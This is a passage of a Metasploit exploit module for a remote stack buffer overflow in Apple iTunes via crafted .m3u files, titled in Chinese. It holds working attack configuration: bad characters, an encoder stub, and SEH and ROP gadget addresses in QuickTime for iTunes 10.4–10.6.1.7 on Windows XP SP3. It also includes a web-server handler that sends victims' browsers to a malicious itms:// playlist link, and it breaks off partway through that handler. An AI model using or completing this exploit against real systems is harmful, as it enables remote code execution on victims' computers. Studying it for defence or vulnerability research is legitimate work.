Apple iTunes '.m3u'文件远程栈缓冲区溢出漏洞(2)

'Platform'          => ['win'],
            'Payload'           =>
                {
                    'Space'     => 1000,
                    'BadChars'  => "\x00\x0a\x0d",
                    'DisableNops'   => true,
                    'PrependEncoder'    => "\x81\xc4\xfc\xfb\xff\xff"   # ADD ESP, -0x404
                },
            'Targets'           =>
                [
                    ['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.7.2 - Windows XP SP3 EN Professional',
                        {
                            'Platform'  => 'win',
                            'Arch'      => ARCH_X86,
                            'SEH'       => 0x6693afab,  # ADD ESP,0xD40 / ret [QuickTime.qts v7.7.2]
                            'ROP_NOP'   => 0x66801044   # RET
                        }
                    ]
                ],
            'DefaultTarget'     => 0
        ))

register_options(
            [
                # IP has to be an reachable address and not 0.0.0.0 as it is used to redirect the browser to itms://<IP>
                OptString.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine (not 0.0.0.0 !)", ""]),
                OptPort.new('SRVPORT', [true, "The local port to listen on", 80]),
                OptString.new('URIPATH', [false, "The URI to use for this exploit", "/"]),
            ],
            self.class
        )
    end

def on_request_uri(cli,request)

# re-generate the payload
        return if ((p = regenerate_payload(cli).encoded) == nil)

host = request.headers['HOST']
        agent = request.headers['USER-AGENT']

# iTunes browser link
        m3u_location = "itms://#{host}/#{rand_text_alphanumeric(8+rand(8))}.m3u"